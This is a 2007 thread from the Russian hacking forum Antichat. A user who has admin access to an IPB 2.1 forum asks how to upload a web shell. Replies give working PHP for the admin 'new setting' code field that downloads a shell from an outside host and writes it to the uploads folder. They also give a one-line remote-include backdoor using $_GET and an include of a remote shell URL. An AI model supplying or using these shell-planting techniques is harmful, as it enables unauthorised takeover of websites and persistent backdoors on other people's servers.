Форум АНТИЧАТ

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   Форумы (https://forum.antichat.xyz/forumdisplay.php?f=16)
-   -   Проблемы с заливкой шелла в ipb (https://forum.antichat.xyz/showthread.php?t=35760)

anakreon 17.03.2007 22:26

Проблемы с заливкой шелла в ipb
 
Народ помогите!!!.
Есть доступ к админке IPB. версия 2.1.*
Не получается залить шелл через смайлы и phtml
при скуль запросах из-под админки выдает ошибку.
Могу слить базу.
Подскажите пожалуйста решение данной проблемы.

Zitt 17.03.2007 22:40

Цитата:

Не получается залить шелл через смайлы и phtml
Почему? В чём траблы?

anakreon 18.03.2007 00:48

загрузка в смайлы запрещены.
А через аттачи пишет ошибку. Мол обратитесь к админу для решения данной проблемы.
Настроил все правильно
так что остается только база. Вот и прошу совета как через базу залиться

maxster 18.03.2007 00:52

В очередной раз почему то забылась самая простая заливка шела через новую настройку,
Идём в "настройки" выбираем любую из них, жмём добавить новую настройку, и в поле "Выполнение PHP-кода до отображения или сохранения настройки:" пишем любой php код, на пример такой:
Код:

$linky="http://site.ru/shell.txt";
$saved="/usr/home/www/site/public_html/forum/uploads/shell.php";
$from=fopen("$linky","r");
$to=fopen("$saved","w");
while(!feof($from)){
  $string=fgets($from,4096);
  fputs($to,$string);
}
fclose($to);
fclose($from);

Узнаем полный путь к uploads:
"Настройки"->"Глобальные Настройки форума"->"Путь к папке /uploads/"
обычно этот путь указывается.

Author: VampiRUS

anakreon 18.03.2007 01:12

Гм... не проходит
Ругается
РЕДУПРЕЖДЕНИЕ IPB [2] fopen(): SAFE MODE Restriction in effect. The script whose uid is 1002 is not allowed to access /usr owned by uid 0 (Файл: /sources/admin/ad_settings.php(1145) : eval()'d code, строка: 4)
ПРЕДУПРЕЖДЕНИЕ IPB [2] fopen(/usr/home/vladimir/forum/uploads/remview.php): failed to open stream: No such file or directory (Файл: /sources/admin/ad_settings.php(1145) : eval()'d code, строка: 4)

maxster 18.03.2007 01:37

значит там safe mod =)

Zitt 18.03.2007 01:43

а
<? include($_GET["c"]); ?>
неканает? или это для другого форума..))?

anakreon 18.03.2007 12:59

помоему это для пхпбб

VampiRUS 18.03.2007 15:20

Цитата:

Сообщение от Zitt
а
<? include($_GET["c"]); ?>
неканает? или это для другого форума..))?

Собстаенно должно проканать он ведь не стал ругаться на то что файл с удалённого хоста. Можно тупо вписать include("http://site.ru/shell.txt");, только потом геморно удалять его будет в некоторых случаях.


Время: 00:58